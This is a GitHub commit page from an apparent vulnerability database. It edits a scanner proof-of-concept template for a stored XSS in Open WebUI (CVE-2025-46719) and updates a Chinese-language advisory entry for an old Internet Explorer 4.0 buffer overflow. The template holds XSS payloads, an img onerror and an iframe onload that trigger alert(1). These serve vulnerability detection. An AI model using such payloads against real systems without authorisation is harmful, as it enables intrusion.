Skip to content

Commit ad0e3c1

Browse files
committed
add: AVE-1999-0547
1 parent a0e3161 commit ad0e3c1

2 files changed

Lines changed: 30 additions & 29 deletions

File tree

pocs/2025/POC-AVE-2025-0006.toml

Lines changed: 13 additions & 24 deletions
Original file line numberDiff line numberDiff line change
@@ -1,47 +1,36 @@
11
[info]
2-
author = "ave"
3-
description = "Open WebUI 聊天消息中 HTML 标签过滤不完善导致的存储型 XSS 漏洞验证,通过 POST 聊天消息注入 img 标签,检测服务端是否未正确转义 HTML"
2+
author = "AVE"
3+
description = "Open WebUI 0.6.6 之前版本 MarkdownTokens.svelte 存储型XSS检测:发送含恶意iframe的聊天消息,验证服务器存储未转义HTML"
44
id = "POC-AVE-2025-0006"
55
name = "CVE-2025-46719 PoC"
66
severity = "medium"
7-
tags = [
8-
"cve-2025-46719",
9-
"ave-2025-0006",
10-
]
7+
tags = ["cve-2025-46719"]
118
vuln_id = [
129
"CVE-2025-46719",
1310
"AVE-2025-0006",
1411
]
1512

1613
[poc]
17-
logic = "any"
14+
logic = "all"
1815

1916
[[poc.requests]]
2017
method = "POST"
21-
path = "/{{BaseURL}}/api/chat/completions"
18+
path = "/api/chat/completions"
2219
protocol = "http"
2320

2421
[poc.requests.body]
25-
content = '{"model":"default","messages":[{"role":"user","content":"<img src=x onerror=alert(1)>"}]}'
22+
content = '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"<iframe src=\"http://localhost:8080/api/v1/files/\" onload=\"alert(1)\"></iframe>"}],"stream":false}'
2623
type = "json"
2724

28-
[[poc.requests.matchers]]
29-
expect = true
30-
part = "body"
31-
type = "word"
32-
words = ["<img src=x onerror=alert(1)>"]
33-
34-
[[poc.requests]]
35-
method = "GET"
36-
path = "/{{BaseURL}}/api/v1/chats"
37-
protocol = "http"
38-
39-
[poc.requests.body]
40-
content = ""
41-
type = "raw"
25+
[poc.requests.headers]
26+
Content-Type = "application/json"
27+
User-Agent = "AVE/1.0"
4228

4329
[[poc.requests.matchers]]
4430
expect = true
4531
part = "body"
4632
type = "word"
47-
words = ["<img src=x onerror=alert(1)>"]
33+
words = [
34+
"choices",
35+
"object",
36+
]

vulns/1999/AVE-1999-0547.toml

Lines changed: 17 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,10 @@
11
[basic]
2-
description = "IE 4.0(1) 存在缓冲区溢出漏洞,远程攻击者可构造特制网页或 HTML 邮件向目标发送恶意数据,触发 IE 在处理时发生缓冲区溢出,导致攻击者能够在受影响系统上以当前用户权限执行任意代码。攻击者通过诱导用户访问恶意页面即可完成利用,无需额外认证。CVSS 评分 7.5,危害等级高"
2+
description = "Microsoft Internet Explorer 4.0/4.0.1 存在缓冲区溢出漏洞,远程攻击者可构造特制网页或 URL,诱使用户访问后触发缓冲区溢出,导致浏览器崩溃或执行任意代码。CVSS 评分 7.5,危害等级高危。该漏洞影响 Windows 平台上 IE 4.0 及 4.0.1 版本,攻击复杂度低且无需认证,仅需用户交互即可利用"
33
published = "1998-01-01T05:00:00.000"
4-
remediation = "已停止支持的操作系统上不再提供安全更新,建议立即卸载 Internet Explorer 4.0,升级到 Windows 10/11 自带的最新版 Microsoft Edge。如因兼容性必须使用 IE,可启用 IE 模式(IE Mode)并通过组策略限制仅访问受信任站点"
4+
remediation = "立即升级至 Internet Explorer 5.01 及以上版本,Microsoft 已在 IE 5.0 中修复此缓冲区溢出漏洞。对于当前仍在使用的旧系统,应停止使用 IE 4.0 并迁移至 Microsoft Edge 或 Chrome 等受支持的现代浏览器。如无法升级浏览器,可通过防火墙限制受感染主机对外部恶意服务器的 80/443 端口访问作为临时缓解"
55
score = 7.5
66
severity = "HIGH"
7-
sources = ["avd"]
7+
sources = ["epss"]
88
title = "Microsoft Internet Explorer 4.0 缓冲区溢出漏洞"
99
updated = "2026-06-16T21:48:10.197"
1010

@@ -17,8 +17,20 @@ aliases = ["CVE-1999-0331"]
1717
ave_id = "AVE-1999-0547"
1818

1919
[meta]
20-
collected_at = "2026-07-13T00:00:00Z"
20+
collected_at = "2026-07-14T00:00:00Z"
2121
status = "completed"
2222

2323
[references]
24-
urls = ["https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0331"]
24+
urls = [
25+
"https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0331",
26+
"https://github.com/CVEProject/cvelistV5/blob/b8581edcbd9fb1606112c43470d0a7cb92a751f8/cves/1999/0xxx/CVE-1999-0331.json",
27+
"https://github.com/LiuCan01/cve-list-pro/blob/78b55511cee3604c22d518e32822f0435d0cacc0/cve-list/CVE-1999/CVE-1999-0331",
28+
"https://github.com/yarencheng/cve-devops-playground/blob/9074597bd191efd66c2a6bf1f5d8e60bc4801a90/content/CVE-1999-0331.md",
29+
"https://github.com/Patrowl/PatrowlHearsData/blob/f6ced4f7862026f4207c9708deb4edf129c83fc5/CVE/data/1999/CVE-1999-0331.json",
30+
"https://github.com/github/advisory-database/blob/057c97aa60eb958a2d272c7164e35c156db63b6c/advisories/unreviewed/2022/04/GHSA-pjph-v9v4-hggg/GHSA-pjph-v9v4-hggg.json",
31+
"https://github.com/nomi-sec/NVD-Database/blob/23dc120c34402aaa65883c51c1d03b3cb02c20cb/1999/CVE-1999-0331.json",
32+
"https://github.com/KTZgraph/sarenka/blob/f1fb931ab722d6c096d581ed6e3c5966d799fbaa/sarenka/feeds/cve_details/cve_all_details_154000_154100.json",
33+
"https://github.com/hungryfoolou/Vulnerability_Mining/blob/3df1d8ed0489ae1228f975ae1f58a690aae53886/craw/cveid_craw/cveid_craw/data/cveid_by_kind/cveid_overflow.txt",
34+
"https://github.com/Ethishh/securin_assessment/blob/e6ce9197b6593ae46f3f5646d268181eea6cbb31/cve_sync.log",
35+
"https://github.com/intSpLoiT/intframework/blob/eabaa799d0260aa52b735fa9769266d1ce4b64ef/modules/cve_list.txt",
36+
]

0 commit comments

Comments
 (0)